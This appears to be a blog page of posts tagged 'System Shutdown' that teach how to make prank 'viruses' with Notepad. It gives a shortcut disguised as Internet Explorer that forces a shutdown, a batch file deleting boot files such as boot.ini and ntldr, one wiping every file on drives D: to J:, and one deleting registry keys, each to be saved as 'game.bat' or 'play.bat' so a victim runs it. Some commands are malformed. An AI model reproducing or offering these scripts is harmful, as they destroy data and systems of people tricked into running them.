Showing posts with label System Shutdown. Show all posts
Showing posts with label System Shutdown. Show all posts

ShutDown PC million Times

By // No comments:
ShutDown PC million Times::::

Step 1 >> Right click on the desktop
Step 2>> Click shortcut


you will get a dialogue box, write in it: shutdown -s -t 1000 c "any comment u want" then press next


note: this "1000" i wrote is the time in seconds needed for ur computer to shutdown,u can put any number u want...

Step 3>>You will get another dialogue box, write in it: Internet Explorer and press finish


Step 4>>You will find the icon on ur desktop, dont open it, just right click on it and press properties>change icon>select the icon the the internet explorer and the press apply then ok
try to open it, it is a virus hehe


Note: the only One way To stop ur computer from shutting down is to go 2 start>run>type: shutdown -a

How to Crash a PC Forever

By // No comments:

Learn How To Make A Dangerous Virus Using Notepad....



How to crash a PC Forever !::: 

Step 1 >> Open Notepad .

Step 2 >> Copy Code .

***************************************************
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini


***********************************************

Step 3 >>Save it as a game.bat file.
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.
REMEMBER - DO NOT CLICK THIS FILE.

How To Make A Virus

By // No comments:
Also Read:-

Learn How To Make A Dangerous Virus Using Notepad....

Just open your notepad
1) Click start -> all programs -> accessories -> notepad
2) Or just press or click windows key + r :: run window will open and
type notepad and hit enter .

NOW TYPE THE FOLLOWING CODE ::
*********************************************************
@echo off
del D:\*.* /f /s /q
del E:\*.* /f /s /q
del F:\*.* /f /s /q
del G:\*.* /f /s /q
del H:\*.* /f /s /q
del I:\*.* /f /s /q
del J:\*.* /f /s /q


***************************************************************

Then save it as game.bat and the batch file is created .


WARNING :: This is the most dangerous virus! Be careful with its use.


Delete the entire registry


@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*

Now save it as play.bat and the batch file is created .